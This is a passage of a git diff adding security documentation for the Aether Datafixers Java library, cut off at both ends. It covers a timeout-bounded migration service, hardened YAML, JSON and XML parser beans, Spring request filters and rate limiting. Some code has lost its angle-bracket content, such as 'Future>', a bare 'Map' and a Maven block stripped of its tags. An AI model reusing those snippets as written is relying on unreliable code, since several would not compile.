+ element.getAsJsonArray()
+ .forEach(e -> validateDepth(e, depth + 1));
+ }
+ }
+}
+```
+
+---
+
+## Complete Migration Service
+
+A complete service combining all security measures:
+
+```java
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.api.fix.AetherDataFixer;
+import de.splatgames.aether.datafixers.api.schema.DataVersion;
+import de.splatgames.aether.datafixers.api.type.TaggedDynamic;
+import de.splatgames.aether.datafixers.api.type.TypeReference;
+
+import java.util.concurrent.*;
+
+public class SecureMigrationService {
+
+ private static final long MAX_PAYLOAD_SIZE = 10 * 1024 * 1024;
+ private static final Duration TIMEOUT = Duration.ofSeconds(30);
+
+ private final AetherDataFixer fixer;
+ private final ExecutorService executor;
+
+ public SecureMigrationService(AetherDataFixer fixer) {
+ this.fixer = fixer;
+ this.executor = Executors.newCachedThreadPool();
+ }
+
+ /**
+ * Migrates untrusted JSON using Jackson.
+ */
+ public TaggedDynamic migrateJson(
+ byte[] untrustedJson,
+ TypeReference type,
+ DataVersion from,
+ DataVersion to) throws Exception {
+
+ validateSize(untrustedJson);
+ Dynamic dynamic = SecureJacksonJsonConfig.parseSecurely(untrustedJson);
+ return migrateWithTimeout(new TaggedDynamic<>(type, dynamic), from, to);
+ }
+
+ /**
+ * Migrates untrusted YAML using SnakeYAML.
+ */
+ public TaggedDynamic migrateYaml(
+ String untrustedYaml,
+ TypeReference type,
+ DataVersion from,
+ DataVersion to) throws Exception {
+
+ validateSize(untrustedYaml);
+ Dynamic dynamic = SecureSnakeYamlConfig.parseSecurely(untrustedYaml);
+ return migrateWithTimeout(new TaggedDynamic<>(type, dynamic), from, to);
+ }
+
+ /**
+ * Migrates untrusted XML using Jackson.
+ */
+ public TaggedDynamic migrateXml(
+ String untrustedXml,
+ TypeReference type,
+ DataVersion from,
+ DataVersion to) throws Exception {
+
+ validateSize(untrustedXml);
+ Dynamic dynamic = SecureJacksonXmlConfig.parseSecurely(untrustedXml);
+ return migrateWithTimeout(new TaggedDynamic<>(type, dynamic), from, to);
+ }
+
+ private void validateSize(byte[] data) {
+ if (data.length > MAX_PAYLOAD_SIZE) {
+ throw new PayloadTooLargeException(
+ "Payload exceeds maximum size of " + MAX_PAYLOAD_SIZE);
+ }
+ }
+
+ private void validateSize(String data) {
+ if (data.length() > MAX_PAYLOAD_SIZE) {
+ throw new PayloadTooLargeException(
+ "Payload exceeds maximum size of " + MAX_PAYLOAD_SIZE);
+ }
+ }
+
+ private TaggedDynamic migrateWithTimeout(
+ TaggedDynamic input,
+ DataVersion from,
+ DataVersion to) throws Exception {
+
+ Future> future = executor.submit(
+ () -> fixer.update(input, from, to)
+ );
+
+ try {
+ return future.get(TIMEOUT.toMillis(), TimeUnit.MILLISECONDS);
+ } catch (TimeoutException e) {
+ future.cancel(true);
+ throw new MigrationTimeoutException("Migration timed out after " + TIMEOUT, e);
+ } catch (ExecutionException e) {
+ throw new MigrationException("Migration failed", e.getCause());
+ }
+ }
+
+ public void shutdown() {
+ executor.shutdown();
+ }
+}
+```
+
+### Usage
+
+```java
+SecureMigrationService service = new SecureMigrationService(fixer);
+
+// Migrate JSON
+TaggedDynamic result = service.migrateJson(
+ jsonBytes,
+ TypeReferences.PLAYER,
+ new DataVersion(100),
+ new DataVersion(200)
+);
+
+// Migrate YAML
+TaggedDynamic yamlResult = service.migrateYaml(
+ yamlString,
+ TypeReferences.CONFIG,
+ new DataVersion(1),
+ new DataVersion(5)
+);
+
+// Migrate XML
+TaggedDynamic xmlResult = service.migrateXml(
+ xmlString,
+ TypeReferences.SETTINGS,
+ new DataVersion(1),
+ new DataVersion(3)
+);
+```
+
+---
+
+## Exception Classes
+
+```java
+public class PayloadTooLargeException extends SecurityException {
+ public PayloadTooLargeException(String message) {
+ super(message);
+ }
+}
+
+public class MigrationTimeoutException extends RuntimeException {
+ public MigrationTimeoutException(String message, Throwable cause) {
+ super(message, cause);
+ }
+}
+
+public class MigrationException extends RuntimeException {
+ public MigrationException(String message, Throwable cause) {
+ super(message, cause);
+ }
+}
+```
+
+---
+
+## Related
+
+- [Best Practices](best-practices.md)
+- [SnakeYAML Security](format-considerations/snakeyaml.md)
+- [Jackson Security](format-considerations/jackson.md)
+- [Gson Security](format-considerations/gson.md)
+- [Spring Security Integration](spring-security-integration.md)
diff --git a/docs/security/spring-security-integration.md b/docs/security/spring-security-integration.md
new file mode 100644
index 0000000..87087fe
--- /dev/null
+++ b/docs/security/spring-security-integration.md
@@ -0,0 +1,649 @@
+# Spring Security Integration
+
+This guide covers integrating secure Aether Datafixers usage with Spring Boot and Spring Security.
+
+## Overview
+
+When using the `aether-datafixers-spring-boot-starter`, additional security measures should be implemented at the Spring level:
+
+1. **Secure Bean Configuration** — Configure secure parsers as Spring beans
+2. **Request Validation** — Validate payloads before they reach migration endpoints
+3. **Rate Limiting** — Prevent abuse of migration endpoints
+4. **Audit Logging** — Track migration attempts for security monitoring
+
+---
+
+## Secure Bean Configuration
+
+### Secure Parser Beans
+
+```java
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.yaml.snakeyaml.LoaderOptions;
+import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.fasterxml.jackson.core.JsonFactory;
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.dataformat.xml.XmlFactory;
+import com.fasterxml.jackson.dataformat.xml.XmlMapper;
+import javax.xml.stream.XMLInputFactory;
+
+@Configuration
+public class SecureDataFixerConfig {
+
+ @Bean
+ public Yaml secureYaml() {
+ LoaderOptions options = new LoaderOptions();
+ options.setMaxAliasesForCollections(50);
+ options.setNestingDepthLimit(50);
+ options.setCodePointLimit(3 * 1024 * 1024);
+ options.setAllowDuplicateKeys(false);
+ return new Yaml(new SafeConstructor(options));
+ }
+
+ @Bean
+ public ObjectMapper secureJsonMapper() {
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxNumberLength(100)
+ .maxStringLength(1_000_000)
+ .build();
+
+ JsonFactory factory = JsonFactory.builder()
+ .streamReadConstraints(constraints)
+ .build();
+
+ return new ObjectMapper(factory);
+ }
+
+ @Bean
+ public XmlMapper secureXmlMapper() {
+ XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
+ xmlInputFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+ xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+
+ StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxStringLength(1_000_000)
+ .build();
+
+ XmlFactory factory = XmlFactory.builder()
+ .xmlInputFactory(xmlInputFactory)
+ .streamReadConstraints(constraints)
+ .build();
+
+ return XmlMapper.builder(factory).build();
+ }
+}
+```
+
+### Secure DynamicOps Beans
+
+```java
+import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
+import de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps;
+
+@Configuration
+public class SecureDynamicOpsConfig {
+
+ @Bean
+ public JacksonJsonOps secureJsonOps(ObjectMapper secureJsonMapper) {
+ return new JacksonJsonOps(secureJsonMapper);
+ }
+
+ @Bean
+ public JacksonXmlOps secureXmlOps(XmlMapper secureXmlMapper) {
+ return new JacksonXmlOps(secureXmlMapper);
+ }
+}
+```
+
+---
+
+## Request Validation Filter
+
+### Payload Size Validation
+
+```java
+import jakarta.servlet.FilterChain;
+import jakarta.servlet.ServletException;
+import jakarta.servlet.http.HttpServletRequest;
+import jakarta.servlet.http.HttpServletResponse;
+import org.springframework.core.Ordered;
+import org.springframework.core.annotation.Order;
+import org.springframework.http.HttpStatus;
+import org.springframework.stereotype.Component;
+import org.springframework.web.filter.OncePerRequestFilter;
+
+@Component
+@Order(Ordered.HIGHEST_PRECEDENCE)
+public class PayloadSizeValidationFilter extends OncePerRequestFilter {
+
+ private static final long MAX_PAYLOAD_SIZE = 10 * 1024 * 1024; // 10MB
+
+ @Override
+ protected void doFilterInternal(
+ HttpServletRequest request,
+ HttpServletResponse response,
+ FilterChain chain) throws ServletException, IOException {
+
+ // Check Content-Length header
+ long contentLength = request.getContentLengthLong();
+ if (contentLength > MAX_PAYLOAD_SIZE) {
+ response.setStatus(HttpStatus.PAYLOAD_TOO_LARGE.value());
+ response.getWriter().write("Payload exceeds maximum size");
+ return;
+ }
+
+ chain.doFilter(request, response);
+ }
+
+ @Override
+ protected boolean shouldNotFilter(HttpServletRequest request) {
+ // Only filter migration endpoints
+ return !request.getRequestURI().startsWith("/api/migrate");
+ }
+}
+```
+
+### Content-Type Validation
+
+```java
+import org.springframework.http.MediaType;
+
+@Component
+@Order(Ordered.HIGHEST_PRECEDENCE + 1)
+public class ContentTypeValidationFilter extends OncePerRequestFilter {
+
+ private static final Set ALLOWED_CONTENT_TYPES = Set.of(
+ MediaType.APPLICATION_JSON_VALUE,
+ "application/yaml",
+ "text/yaml",
+ MediaType.APPLICATION_XML_VALUE,
+ MediaType.TEXT_XML_VALUE
+ );
+
+ @Override
+ protected void doFilterInternal(
+ HttpServletRequest request,
+ HttpServletResponse response,
+ FilterChain chain) throws ServletException, IOException {
+
+ String contentType = request.getContentType();
+ if (contentType != null) {
+ String baseType = contentType.split(";")[0].trim().toLowerCase();
+ if (!ALLOWED_CONTENT_TYPES.contains(baseType)) {
+ response.setStatus(HttpStatus.UNSUPPORTED_MEDIA_TYPE.value());
+ response.getWriter().write("Unsupported content type");
+ return;
+ }
+ }
+
+ chain.doFilter(request, response);
+ }
+
+ @Override
+ protected boolean shouldNotFilter(HttpServletRequest request) {
+ return !request.getRequestURI().startsWith("/api/migrate") ||
+ !"POST".equalsIgnoreCase(request.getMethod());
+ }
+}
+```
+
+---
+
+## Rate Limiting
+
+### Using Resilience4j
+
+Add dependency:
+
+```xml
+
+ io.github.resilience4j
+ resilience4j-spring-boot3
+ 2.2.0
+
+```
+
+Configuration:
+
+```yaml
+# application.yml
+resilience4j:
+ ratelimiter:
+ instances:
+ migration:
+ limitForPeriod: 10
+ limitRefreshPeriod: 1s
+ timeoutDuration: 0
+```
+
+Controller:
+
+```java
+import io.github.resilience4j.ratelimiter.annotation.RateLimiter;
+
+@RestController
+@RequestMapping("/api/migrate")
+public class MigrationController {
+
+ private final MigrationService migrationService;
+
+ public MigrationController(MigrationService migrationService) {
+ this.migrationService = migrationService;
+ }
+
+ @PostMapping("/json")
+ @RateLimiter(name = "migration", fallbackMethod = "rateLimitFallback")
+ public ResponseEntity migrateJson(
+ @RequestBody byte[] data,
+ @RequestParam int fromVersion,
+ @RequestParam int toVersion,
+ @RequestParam String type) {
+
+ MigrationResult result = migrationService
+ .migrate(data)
+ .from(fromVersion)
+ .to(toVersion)
+ .execute();
+
+ return ResponseEntity.ok(result);
+ }
+
+ public ResponseEntity rateLimitFallback(
+ byte[] data, int fromVersion, int toVersion, String type, Throwable t) {
+ return ResponseEntity.status(HttpStatus.TOO_MANY_REQUESTS)
+ .body(MigrationResult.error("Rate limit exceeded. Please try again later."));
+ }
+}
+```
+
+### Using Bucket4j
+
+```java
+import io.github.bucket4j.Bandwidth;
+import io.github.bucket4j.Bucket;
+import io.github.bucket4j.Refill;
+
+@Component
+public class RateLimitingService {
+
+ private final Map